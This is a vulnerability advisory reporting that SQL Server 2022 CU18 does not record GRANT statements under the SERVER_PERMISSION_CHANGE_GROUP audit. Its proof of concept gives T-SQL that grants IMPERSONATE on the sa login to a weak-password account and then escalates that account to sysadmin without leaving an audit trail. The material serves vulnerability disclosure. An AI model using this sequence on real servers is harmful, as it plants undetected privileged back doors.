Title: SQL Server 2022 Security Audit Failure Vulnerability
Product:                   Microsoft SQL Server
Affected Version(s):       2022  (RTM-CU18) (KB5050771) 
Tested Version(s):         2022  (RTM-CU18) (KB5050771)
Fix:                       This security bug will be fixed in a future cumulative update released by Microsoft 
Risk Level:                Medium
Author of Advisory:        Emad Al-Mousa

Overview:

native security auditing is an important facility used to track and monitor activities within the database based on pre-defined audit policies. These security audit policies are engineered
by the vendor to capture sensitive actions that can potentially jeopardise your database system.

*****************************************
Vulnerability Details:

In Microsoft SQL Server 2022, when configuring a security audit for "SERVER_PERMISSION_CHANGE_GROUP" ,  it doesn’t get recorded in the audit logs as expected and designed !


*****************************************
Proof of Concept (PoC):

I will create a dummy local SQL authentication account and will call it “TIM”:

USE [master]
GO
CREATE LOGIN [TIM] WITH PASSWORD=N'TIM', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO

Then, I will create the audit policy as shown below:

USE [master]
GO

CREATE SERVER AUDIT [test-permission-change]
TO FILE 
(   FILEPATH = N'D:\SQLServer_2022\audit\'
    ,MAXSIZE = 0 MB
    ,MAX_ROLLOVER_FILES = 2147483647
    ,RESERVE_DISK_SPACE = OFF
) WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE, AUDIT_GUID = 'a2d718eb-2588-4d64-b7c9-249441e96d42')
ALTER SERVER AUDIT [test-permission-change] WITH (STATE = ON)
GO

USE [master]
GO

CREATE SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE]
FOR SERVER AUDIT [test-permission-change]
ADD (SERVER_PERMISSION_CHANGE_GROUP)
WITH (STATE = ON)
GO


Per documentation: https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16

SERVER_PERMISSION_CHANGE_GROUP: This event is raised when a GRANT, REVOKE, or DENY is issued for permissions in the server scope. 


-- It's expected that configured security auditing will capture the following t-sql statement:

GRANT IMPERSONATE ON LOGIN::sa TO TIM
GO


Unfortunately, the above t-sql command is NOT logged in audit logs !!

This can be verified by querying audit logs:

SELECT * FROM sys.fn_get_audit_file('D:\SQLServer_2022\audit\*',
DEFAULT,
DEFAULT) order by event_time desc
GO


So, now there is a back-door/weakness introduced in the SQL Server instance and it will not be detected. Database account TIM can now login and execute the following t-sql query to escalate his permission to SYSADMIN role successfully: 

execute as login='sa'
ALTER SERVER ROLE [sysadmin] ADD MEMBER [TIM]
GO


*****************************************
References:
https://databasesecurityninja.wordpress.com/2025/04/01/sql-server-vulnerability-audit-failure-for-server_permission_change_group-in-sql-server-2022/
https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16